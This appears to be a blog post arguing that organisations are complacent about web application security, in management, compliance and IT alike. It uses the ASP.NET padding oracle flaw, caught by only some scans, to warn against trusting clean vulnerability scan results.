Don’t get caught off guard. We hear that statement all the time with regards to information security. Sadly, as many businesses have experienced, such talk is cheap. Obviously no one wants their Web site to get hacked. Okay, maybe a few admins or developers who are dying to find a way to get the funding and support they need to do application security right. But these folks are the exception.
So what does it really mean to not get caught off guard in the context of application security? It’s more complicated than most assume. There are much bigger forces at work here than simple firewall, SSL, and trusted website seals. Once of the things that really stands out to me is that all the right people are not on the same page. Quite often management doesn’t really understand what’s at risk. Nor do they understand the process, the expertise and attention to detail that must be put into application security testing. You also have managers who have this fear that numerous security flaws will be uncovered and then unjustified controls will end up getting in the way of doing business. I know I’ve ranted about this stuff before but I truly believe it’s the source of many problems we face.
Those in management are not the only group of people with their heads in the sand though. There’s compliance, internal audit, marketing, customer service, operations and so on – all of whom often have their hands in a typical business’s Web presence yet are often completely disconnected from the risks associated with what they manage. I’m not saying everyone is this way. However, many people in these roles are extremely naive when it comes to true application security. They’ll often perform their self-assessment checklist audit, run a basic vulnerability scan, or assume someone else (IT) is taking care of the matter. That’s not always the case. People in IT often have their hands full and aren’t taking the appropriate steps to ensure Web security either. It’s not necessarily a lack of caring but rather a case of “I can’t keep up”, “We’ll get to it eventually”, or “No one has ever asked us about it”.
There’s also a common assumption that all users of Web applications can be trusted. Maybe so. It’s all the other hooligans of the world who are trying their hardest to gain the credentials of “trusted” users, perform direct hacks or even spread malware via your systems. Likewise, many assume that Web security compromises will be highly visible so the appropriate people can react accordingly. That’s not always the case. Recently I seen several situations up close whereby Web application and security administrators had no clue their applications were being exploited until it was too late – way too late.
Finally, there’s the assumption that if nothing turns up in Web vulnerability scans and manual analysis that everything’s safe and secure. Things may seem clean and clear but you absolutely cannot rely on that. Case in point: the recent padding oracle exploit on ASP.NET-based systems. I was working on a project where we didn’t uncover the exploit using a basic scan policy yet found it when using a full scan policy. Another scanner used didn’t find the flaw at all. Imagine trying to explain such an oversight once your Web server is completely compromised.
My point is: never ever assume anything…such an approach will only serve to bite you when you’re least expecting it. So know the facts, be proactive, and know that there’s always room for improvement.